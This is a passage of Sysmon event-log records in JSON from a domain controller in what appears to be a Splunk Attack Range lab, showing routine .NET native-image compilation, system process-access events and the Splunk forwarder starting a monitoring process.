{"EventTime":"2020-08-01 05:57:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6479,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:45.916\r\nProcessGuid: {A837DB8D-044A-5F25-0000-001009460C00}\r\nProcessId: 3236\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ca4-0\\System.ServiceModel.dll\r\nCreationUtcTime: 2020-08-01 05:57:45.916","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:45.916","ProcessGuid":"{A837DB8D-044A-5F25-0000-001009460C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ca4-0\\System.ServiceModel.dll","CreationUtcTime":"2020-08-01 05:57:45.916","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6480,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:46.291\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-045A-5F25-0000-0010AA520C00}\r\nTargetProcessId: 2280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:46.291","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-045A-5F25-0000-0010AA520C00}","TargetProcessId":"2280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6481,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:46.291\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-045A-5F25-0000-0010AA520C00}\r\nTargetProcessId: 2280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:46.291","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-045A-5F25-0000-0010AA520C00}","TargetProcessId":"2280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6482,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:46.291\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-045A-5F25-0000-0010AA520C00}\r\nTargetProcessId: 2280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:46.291","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-045A-5F25-0000-0010AA520C00}","TargetProcessId":"2280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6483,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:46.588\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-045A-5F25-0000-001009570C00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:46.588","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-045A-5F25-0000-001009570C00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6484,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:46.588\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-045A-5F25-0000-001009570C00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:46.588","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-045A-5F25-0000-001009570C00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6485,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:46.588\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-045A-5F25-0000-001009570C00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:46.588","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-045A-5F25-0000-001009570C00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6486,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nProcessGuid: {A837DB8D-045E-5F25-0000-0010A85C0C00}\r\nProcessId: 3380\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","ProcessGuid":"{A837DB8D-045E-5F25-0000-0010A85C0C00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6487,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010A85C0C00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010A85C0C00}","TargetProcessId":"3380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program 